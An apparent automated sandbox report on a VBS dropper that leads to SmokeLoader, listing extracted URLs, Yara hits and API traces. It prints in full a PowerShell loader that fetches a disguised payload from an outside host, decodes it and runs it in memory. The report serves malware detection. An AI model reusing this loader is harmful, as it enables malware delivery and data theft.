http://prolinice.ga/index.phpMozilla/5.0
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
            Source: explorer.exe, 0000000C.00000000.1506335410.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506356157.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1505560118.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: powershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.1765549035.000000000C44D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: powershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: explorer.exe, 0000000C.00000000.1506729663.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsString found in binary or memory: https://github.com/koswald/VBScript
            Source: wscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbsString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
            Source: wscript.exe, 00000000.00000003.1223863747.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1224054764.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226918992.00000148B15AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227341104.00000148B3441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223724844.00000148B3378000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223795021.00000148B3341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227807236.00000148B3551000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbsString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
            Source: powershell.exe, 00000002.00000002.1452333990.000001478891E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/
            Source: powershell.exe, 00000002.00000002.1453088771.0000014788B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
            Source: powershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgX
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000C.00000000.1506729663.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
            Source: explorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3988, type: MEMORYSTR
            Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B162B GetKeyboardState,ToUnicode,26_2_001B162B

            E-Banking Fraud

            barindex
            Checks if browser processes are running
            Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe18_2_00162EA8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe18_2_00163862

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: Process Memory Space: powershell.exe PID: 5128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Potential malicious VBS script found (suspicious strings)
            Source: Initial file: Dim cmd 'string: ShellExecute arg #1
            Source: Initial file: Dim args 'string: ShellExecute arg #2
            Source: Initial file: Dim pwd 'string: ShellExecute arg #3
            Source: Initial file: Dim privileges 'string: ShellExecute arg #4
            Source: Initial file: .ShellExecute cmd, args, pwd, privileges
            Source: Initial file: Dim cmd 'string: ShellExecute arg #1
            Source: Initial file: 'Class scope: args_ 'string: ShellExecute arg #2
            Source: Initial file: Dim pwd 'string: ShellExecute arg #3
            Source: Initial file: Dim privileges 'string: ShellExecute arg #4
            Source: Initial file: .ShellExecute cmd, args_, pwd, privileges
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402F5D RtlCreateUserThread,NtTerminateProcess,11_2_00402F5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,11_2_00402321
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004025D3 NtClose,11_2_004025D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402686 NtClose,11_2_00402686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004030BF RtlCreateUserThread,NtTerminateProcess,11_2_004030BF
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A04B92 RtlMoveMemory,NtUnmapViewOfSection,14_2_00A04B92
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A033C3 NtQueryInformationFile,14_2_00A033C3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A0349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,14_2_00A0349B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A0342B NtQueryObject,NtQueryObject,RtlMoveMemory,14_2_00A0342B
            Source: C:\Windows\explorer.exeCode function: 16_2_009B38B0 NtUnmapViewOfSection,16_2_009B38B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00801016 RtlMoveMemory,NtUnmapViewOfSection,17_2_00801016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00163D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,18_2_00163D8D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00162E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,18_2_00162E1B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00161F4E NtCreateSection,NtMapViewOfSection,18_2_00161F4E
